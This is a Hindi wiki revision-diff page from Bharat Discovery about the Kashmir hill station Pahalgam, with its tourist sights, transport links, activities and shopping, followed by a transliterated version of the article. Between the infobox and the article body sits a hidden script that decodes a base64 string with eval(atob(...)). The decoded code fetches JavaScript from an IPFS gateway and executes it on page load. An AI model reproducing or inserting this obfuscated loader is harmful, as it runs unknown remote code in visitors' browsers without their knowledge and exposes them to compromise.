Difference between revisions of "पहलगाम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Pahalgam.jpg
 +
|चित्र का नाम=पहलगाम से बहती हुई लिद्दर नदी
 +
|विवरण=पहलगाम धरती पर स्वर्ग माने जाने वाले [[कश्मीर]] के सबसे ख़ूबसूरत हिल स्टेशनों में एक है।
 +
|राज्य=[[जम्मू और कश्मीर]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[अनन्तनाग ज़िला|अनंतनाग]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=उत्तर- 34° 01' - पूर्व- 75° 11'
 +
|मार्ग स्थिति=पहलगाम सड़क मार्ग द्वारा [[अनंतनाग]] से 38.8 किमी., [[श्रीनगर]] से 48.3 किमी., [[जम्मू]] से 282 किमी., [[दिल्ली]] से 831 किमी. की दूरी पर स्थित है।
 +
|प्रसिद्धि=
 +
|कब जाएँ=[[मई]] से [[सितम्बर]] और [[नवंबर]] से [[फरवरी]]
 +
|कैसे पहुँचें=हवाई जहाज़, रेल, बस, टैक्सी आदि से पहुँचा जा सकता है।
 +
|हवाई अड्डा=श्रीनगर हवाई अड्डा निकटतम हवाई अड्डा है।
 +
|रेलवे स्टेशन=ऊधमपुर रेलवे स्टेशन निकटतम रेलवे स्टेशन है।
 +
|बस अड्डा=
 +
|यातायात=बस, टैक्सी आदि
 +
|क्या देखें=ममलेश्वर, ओवेरा वन्यजीव अभयारण्य, मरतड, अचाबल, चंदनवाड़ी आदि
 +
|कहाँ ठहरें=होटल, गेस्ट हाउस
 +
|क्या खायें=
 +
|क्या ख़रीदें=ऊन से बने कपड़े
 +
|एस.टी.डी. कोड=1936
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?saddr=Srinagar+Airport+Terminus,+Srinagar&daddr=Pahalgam&hl=en&ll=33.888087,75.048294&spn=0.391591,0.727158&sll=34.038436,75.056534&sspn=0.390899,0.727158&geocode=FYCbBgIduvR0BCEXBNHmsL6-3w%3BFUsLBwIdJDd9BCnfCZV7Kj_iODHFGPsB8M_BCA&vpsrc=0&mra=ls&t=m&z=11 गूगल मानचित्र]
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
 
 
[[चित्र:Pahalgam.jpg|thumb|250px|पहलगाम से बहती हुई लिद्दर नदी]]
 
[[चित्र:Pahalgam.jpg|thumb|250px|पहलगाम से बहती हुई लिद्दर नदी]]
 
पहलगाम धरती पर स्वर्ग माने जाने वाले [[कश्मीर]] के सबसे ख़ूबसूरत हिल स्टेशनों में एक है। समुद्र तल से 2130 मीटर की ऊँचाई पर स्थित पहलगाम लिद्दर नदी और शेषनाग झील के मुहाने पर बसा है। [[अनंतनाग|अनंतनाग ज़िले]] में चारों ओर बर्फ से ढकी चोटियों, चमकते [[ग्लेशियर]] और छलछल करती नदी के बीच बसा पहलगाम सैलानियों के मन में अमिट छाप छोड़ता है।  
 
पहलगाम धरती पर स्वर्ग माने जाने वाले [[कश्मीर]] के सबसे ख़ूबसूरत हिल स्टेशनों में एक है। समुद्र तल से 2130 मीटर की ऊँचाई पर स्थित पहलगाम लिद्दर नदी और शेषनाग झील के मुहाने पर बसा है। [[अनंतनाग|अनंतनाग ज़िले]] में चारों ओर बर्फ से ढकी चोटियों, चमकते [[ग्लेशियर]] और छलछल करती नदी के बीच बसा पहलगाम सैलानियों के मन में अमिट छाप छोड़ता है।  
Line 6: Line 44:
 
====ममलेश्वर====
 
====ममलेश्वर====
 
पहलगाम से 1 किमी. की दूरी पर ममल गाँव स्थित है। यहाँ लिद्दर नदी के दूसरी तरफ ममलेश्वर नामक [[शिव]] का एक छोटा मंदिर है। इस मंदिर का संबंध 12 शताब्दी के राजा जयसीमा के काल से है। यह मंदिर कश्मीर के सबसे प्राचीन मंदिरों में एक है।  
 
पहलगाम से 1 किमी. की दूरी पर ममल गाँव स्थित है। यहाँ लिद्दर नदी के दूसरी तरफ ममलेश्वर नामक [[शिव]] का एक छोटा मंदिर है। इस मंदिर का संबंध 12 शताब्दी के राजा जयसीमा के काल से है। यह मंदिर कश्मीर के सबसे प्राचीन मंदिरों में एक है।  
 +
 
बैसारन- 150 मीटर ऊंचा यह घास का मैदान पहलगाम से लगभग 5 किमी. दूर है। पहलगाम और लिद्दर घाटी के मनोरम नजार यहां से देखे जा सकते हैं। बैसारन पाइन के वनों और बर्फ से आच्छादित चोटियों से घिरा है।  
 
बैसारन- 150 मीटर ऊंचा यह घास का मैदान पहलगाम से लगभग 5 किमी. दूर है। पहलगाम और लिद्दर घाटी के मनोरम नजार यहां से देखे जा सकते हैं। बैसारन पाइन के वनों और बर्फ से आच्छादित चोटियों से घिरा है।  
 
तुलियन झील- यह झील बैसारन से 11 किमी. की दूरी पर है। साल के अधिकांश समय बर्फ से ढकी चोटियों से घिरी यह ख़ूबसूरत झील 3353 मीटर की ऊंचाई पर है। यहां के दृश्य सभी को आश्चर्यचकित कर देते हैं।
 
तुलियन झील- यह झील बैसारन से 11 किमी. की दूरी पर है। साल के अधिकांश समय बर्फ से ढकी चोटियों से घिरी यह ख़ूबसूरत झील 3353 मीटर की ऊंचाई पर है। यहां के दृश्य सभी को आश्चर्यचकित कर देते हैं।
Line 13: Line 52:
 
====मरतड====
 
====मरतड====
 
मतन गाँव में एक ऊँचे पठार पर स्थित मरतड मंदिर के अवशेष बड़ी संख्या में सैलानियों को आकर्षित करते हैं। मंदिर में स्थापित देवता की मूर्ति के नाम पर ही गाँव का नाम मतन या मरतड पड़ा। ललितादित्य मुख्तापिड़ा द्वारा बनवाया गया यह मंदिर कश्मीर के सबसे आकर्षण अवशेषों में है।  
 
मतन गाँव में एक ऊँचे पठार पर स्थित मरतड मंदिर के अवशेष बड़ी संख्या में सैलानियों को आकर्षित करते हैं। मंदिर में स्थापित देवता की मूर्ति के नाम पर ही गाँव का नाम मतन या मरतड पड़ा। ललितादित्य मुख्तापिड़ा द्वारा बनवाया गया यह मंदिर कश्मीर के सबसे आकर्षण अवशेषों में है।  
 +
 
अरू- चहचहाते पक्षियों की आवाज, सरसराती ठंडी हवाओं और नीले आकाश के बीच बसा अरू समुद्र तल से 2408 मीटर की ऊंचाई पर स्थित है। शहरी जीवन से दूर लिद्दर नदी के किनार बसा अरू हरा भरा और मैदानी इलाका है।  
 
अरू- चहचहाते पक्षियों की आवाज, सरसराती ठंडी हवाओं और नीले आकाश के बीच बसा अरू समुद्र तल से 2408 मीटर की ऊंचाई पर स्थित है। शहरी जीवन से दूर लिद्दर नदी के किनार बसा अरू हरा भरा और मैदानी इलाका है।  
 
[[चित्र:Pahalgam-1.jpg|thumb|250px|पहलगाम|left]]
 
[[चित्र:Pahalgam-1.jpg|thumb|250px|पहलगाम|left]]
Line 23: Line 63:
 
==यातायात और परिवाहन==
 
==यातायात और परिवाहन==
 
====वायु मार्ग====
 
====वायु मार्ग====
पहलगाम का निकटतम एयरपोर्ट बडगाम ज़िले में हैं। यह एयरपोर्ट [[भारत]] के प्रमुख शहरों से जुड़ा है।  
+
पहलगाम का निकटतम हवाई अड्डा बडगाम ज़िले में हैं। यह हवाई अड्डा [[भारत]] के प्रमुख शहरों से जुड़ा है। इसके अतिरिक्त श्रीनगर हवाई अड्डा भी है।  
 
====रेल मार्ग====
 
====रेल मार्ग====
[[जम्मू]] पहलगाम का नजदीकी रेलवे स्टेशन है। भारत के अनेक शहरों से नियमित ट्रेनें जम्मू जाती हैं।  
+
[[जम्मू]] और ऊधमपुर रेलवे स्टेशन, पहलगाम के  निकटतम रेलवे स्टेशन है। भारत के अनेक शहरों से नियमित रेल जम्मू जाती हैं।  
 
====सड़क मार्ग====  
 
====सड़क मार्ग====  
 
राष्ट्रीय राजमार्ग 1 ए कश्मीर घाटी को भारत के अन्य शहरों से जोड़ता है। [[श्रीनगर]] से पहलगाम के लिए नियमित बसें और टैक्सियों की व्यवस्था है।
 
राष्ट्रीय राजमार्ग 1 ए कश्मीर घाटी को भारत के अन्य शहरों से जोड़ता है। [[श्रीनगर]] से पहलगाम के लिए नियमित बसें और टैक्सियों की व्यवस्था है।
 
[[चित्र:Pahalgam-3.jpg|thumb|250px|पहलगाम से बहती हुई लिद्दर नदी ]]
 
[[चित्र:Pahalgam-3.jpg|thumb|250px|पहलगाम से बहती हुई लिद्दर नदी ]]
==खेल==
+
==खेल और मनोरंजन==
 
'''हार्स राइडिंग'''  
 
'''हार्स राइडिंग'''  
 
*हार्स राइडिंग (अंग्रेजी: Horse Riding) पहलगाम में हार्स राइडिंग का अपना अलग ही मजा है। इसके लिये यहाँ के स्थानीय लोगों के पास अनेकों टट्टू उपलब्ध हैं जिन्हें आप किराये पर ले सकते हैं।
 
*हार्स राइडिंग (अंग्रेजी: Horse Riding) पहलगाम में हार्स राइडिंग का अपना अलग ही मजा है। इसके लिये यहाँ के स्थानीय लोगों के पास अनेकों टट्टू उपलब्ध हैं जिन्हें आप किराये पर ले सकते हैं।
Line 38: Line 78:
 
'''पर्वतारोहण'''   
 
'''पर्वतारोहण'''   
 
*पर्वतारोहण (अंग्रेजी: trekking) पहलगाम से आप चाँदवारी, शेषनाग,पंचतरणी, अमरनाथ गुफा मन्दिर, सोनमर्ग आदि स्थानों के लिये पर्वतारोहण कर सकते हैं।<ref>{{cite web |url=http://agoodplace4all.com/?p=4108 |title=पहलगाम |accessmonthday=[[6 सितम्बर]] |accessyear=2011|last= |first= |authorlink= |format= |publisher=हिन्दी वेबसाइट |language=हिन्दी }}</ref>
 
*पर्वतारोहण (अंग्रेजी: trekking) पहलगाम से आप चाँदवारी, शेषनाग,पंचतरणी, अमरनाथ गुफा मन्दिर, सोनमर्ग आदि स्थानों के लिये पर्वतारोहण कर सकते हैं।<ref>{{cite web |url=http://agoodplace4all.com/?p=4108 |title=पहलगाम |accessmonthday=[[6 सितम्बर]] |accessyear=2011|last= |first= |authorlink= |format= |publisher=हिन्दी वेबसाइट |language=हिन्दी }}</ref>
==खरीदारी==  
+
==ख़रीददारी==  
 
पहलगाम मूल रूप से चरवाहों का गाँव है। प्राकृतिक रूप से पहलगाम को ऊन से बने कपड़ों के लिए जाना जाता है। यहाँ की स्थानीय दुकानों के गब्बा और नमदास खरीदा जा सकता है।<ref>{{cite web |url=http://yatrasalah.com/touristPlaces.aspx?id=291 |title=पहलगाम |accessmonthday=[[6 सितम्बर]] |accessyear=2011 |last= |first= |authorlink= |format= |publisher=यात्रा सलाह |language=हिन्दी }}</ref>
 
पहलगाम मूल रूप से चरवाहों का गाँव है। प्राकृतिक रूप से पहलगाम को ऊन से बने कपड़ों के लिए जाना जाता है। यहाँ की स्थानीय दुकानों के गब्बा और नमदास खरीदा जा सकता है।<ref>{{cite web |url=http://yatrasalah.com/touristPlaces.aspx?id=291 |title=पहलगाम |accessmonthday=[[6 सितम्बर]] |accessyear=2011 |last= |first= |authorlink= |format= |publisher=यात्रा सलाह |language=हिन्दी }}</ref>
  
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
Line 52: Line 92:
 
[[Category:जम्मू_और_कश्मीर_के_पर्यटन_स्थल]]
 
[[Category:जम्मू_और_कश्मीर_के_पर्यटन_स्थल]]
 
[[Category:जम्मू_और_कश्मीर]]
 
[[Category:जम्मू_और_कश्मीर]]
[[Category:भारत_के_पर्यटन_स्थल]]
+
[[Category:पर्यटन कोश]]
[[Category:नया पन्ना सितंबर-2011]]
 
 
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 12:05, 27 September 2011

pahalagam
vivaran pahalagam dharati par svarg mane jane vale kashmir ke sabase khoobasoorat hil steshanoan mean ek hai.
rajy jammoo aur kashmir
zila anantanag
bhaugolik sthiti uttar- 34° 01' - poorv- 75° 11'
marg sthiti pahalagam s dak marg dvara anantanag se 38.8 kimi., shrinagar se 48.3 kimi., jammoo se 282 kimi., dilli se 831 kimi. ki doori par sthit hai.
kab jaean mee se sitambar aur navanbar se pharavari
kaise pahuanchean havaee jahaz, rel, bas, taiksi adi se pahuancha ja sakata hai.
havaee adda shrinagar havaee adda nikatatam havaee adda hai.
relave steshan oodhamapur relave steshan nikatatam relave steshan hai.
yatayat bas, taiksi adi
kya dekhean mamaleshvar, overa vanyajiv abhayarany, maratad, achabal, chandanava di adi
kahaan thaharean hotal, gest haus
kya kharidean oon se bane kap de
es.ti.di. kod 1936
chitr:Map-icon.gif googal manachitr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thumb|250px|pahalagam se bahati huee liddar nadi pahalagam dharati par svarg mane jane vale kashmir ke sabase khoobasoorat hil steshanoan mean ek hai. samudr tal se 2130 mitar ki ooanchaee par sthit pahalagam liddar nadi aur sheshanag jhil ke muhane par basa hai. anantanag zile mean charoan or barph se dhaki chotiyoan, chamakate gleshiyar aur chhalachhal karati nadi ke bich basa pahalagam sailaniyoan ke man mean amit chhap chho data hai.

paryatan sthal

mamaleshvar

pahalagam se 1 kimi. ki doori par mamal gaanv sthit hai. yahaan liddar nadi ke doosari taraph mamaleshvar namak shiv ka ek chhota mandir hai. is mandir ka sanbandh 12 shatabdi ke raja jayasima ke kal se hai. yah mandir kashmir ke sabase prachin mandiroan mean ek hai.

baisaran- 150 mitar ooancha yah ghas ka maidan pahalagam se lagabhag 5 kimi. door hai. pahalagam aur liddar ghati ke manoram najar yahaan se dekhe ja sakate haian. baisaran pain ke vanoan aur barph se achchhadit chotiyoan se ghira hai. tuliyan jhil- yah jhil baisaran se 11 kimi. ki doori par hai. sal ke adhikaansh samay barph se dhaki chotiyoan se ghiri yah khoobasoorat jhil 3353 mitar ki ooanchaee par hai. yahaan ke drishy sabhi ko ashcharyachakit kar dete haian.

overa vanyajiv abhayarany

32.27 varg kimi. ke kshetr mean phaila yah abhayarany pahalagam ke nikat sthit hai. yahaan bahut-si durlabh aur luptapray pakshiyoan aur memal ki prajatiyoan dekhi ja sakati haian.

maratad

matan gaanv mean ek ooanche pathar par sthit maratad mandir ke avashesh b di sankhya mean sailaniyoan ko akarshit karate haian. mandir mean sthapit devata ki moorti ke nam par hi gaanv ka nam matan ya maratad p da. lalitadity mukhtapi da dvara banavaya gaya yah mandir kashmir ke sabase akarshan avasheshoan mean hai.

aroo- chahachahate pakshiyoan ki avaj, sarasarati thandi havaoan aur nile akash ke bich basa aroo samudr tal se 2408 mitar ki ooanchaee par sthit hai. shahari jivan se door liddar nadi ke kinar basa aroo hara bhara aur maidani ilaka hai. thumb|250px|pahalagam|left

achabal

yah chhota kasba mugal gardan ke lie prasiddh hai. is gardan ko noorajahaan ne banavana shuroo karavaya tha aur ise poora shahajahaan ki putri jahaanara ne 1640 mean karavaya. is gardan ko kashmir ke sabase savadhani se dijain kie ge gardan mean ek mana jata hai. kaha jata hai yah gardan noorajahaan ka pasandida aramagah tha. ek jharane ki tin naharoan se gardan ko pani milata hai. mukhy nahar mean kuchh akarshan phavvarean haian.

chandanava di

pahalagam se 16 kimi. door sthit chandanava di amaranath yatra ka praranbhik sthan hai jo savan ke mahine mean shuroo hoti hai. amaranath gupha ko shiv ka ghar mana jata hai. chandanava di se 11 kimi. ki doori par sheshanag ki parvatiy jhil hai. yahaan se 13 kimi. door panchatarani amaranath yatra ka aantim padav hai. panchatarani se 6 kimi. door amaranath gupha hai.

hajan

chandanava di marg par sthit hajan ek khoobasoorat pikanik sthal hai. is sthan ki khoobasoorati philm nirmataoan ko kaphi lubhati hai. yahaan ki lokeshan kee philmoan mean dekhi ja sakati hai.

yatayat aur parivahan

vayu marg

pahalagam ka nikatatam havaee adda badagam zile mean haian. yah havaee adda bharat ke pramukh shaharoan se ju da hai. isake atirikt shrinagar havaee adda bhi hai.

rel marg

jammoo aur oodhamapur relave steshan, pahalagam ke nikatatam relave steshan hai. bharat ke anek shaharoan se niyamit rel jammoo jati haian.

s dak marg

rashtriy rajamarg 1 e kashmir ghati ko bharat ke any shaharoan se jo data hai. shrinagar se pahalagam ke lie niyamit basean aur taiksiyoan ki vyavastha hai. thumb|250px|pahalagam se bahati huee liddar nadi

khel aur manoranjan

hars raidiang

  • hars raidiang (aangreji: Horse Riding) pahalagam mean hars raidiang ka apana alag hi maja hai. isake liye yahaan ke sthaniy logoan ke pas anekoan tattoo upalabdh haian jinhean ap kiraye par le sakate haian.

golph

  • golph (aangreji: Golf) pahalagam mean paryatakoan ke liye golph ki suvidha upalabdh hai. vahaan ke toorist seantar se asani ke sath golph set kiraye par liya ja sakata hai.

matsyakhet phishiang

  • matsyakhet phishiang (aangreji: Fishing) suramy evan prakritik drishyoan ka avalokan karate huye lidar nadi mean matsyakhet karane ka apana alag hi anand hai. toorist seantar se asani ke sath isake liye paramit mil jata hai.

parvatarohan

  • parvatarohan (aangreji: trekking) pahalagam se ap chaandavari, sheshanag,panchatarani, amaranath gupha mandir, sonamarg adi sthanoan ke liye parvatarohan kar sakate haian.[1]

kharidadari

pahalagam mool roop se charavahoan ka gaanv hai. prakritik roop se pahalagam ko oon se bane kap doan ke lie jana jata hai. yahaan ki sthaniy dukanoan ke gabba aur namadas kharida ja sakata hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. pahalagam (hindi) hindi vebasait. abhigaman tithi: 6 sitambar, 2011.
  2. pahalagam (hindi) yatra salah. abhigaman tithi: 6 sitambar, 2011.

bahari k diyaan

sanbandhit lekh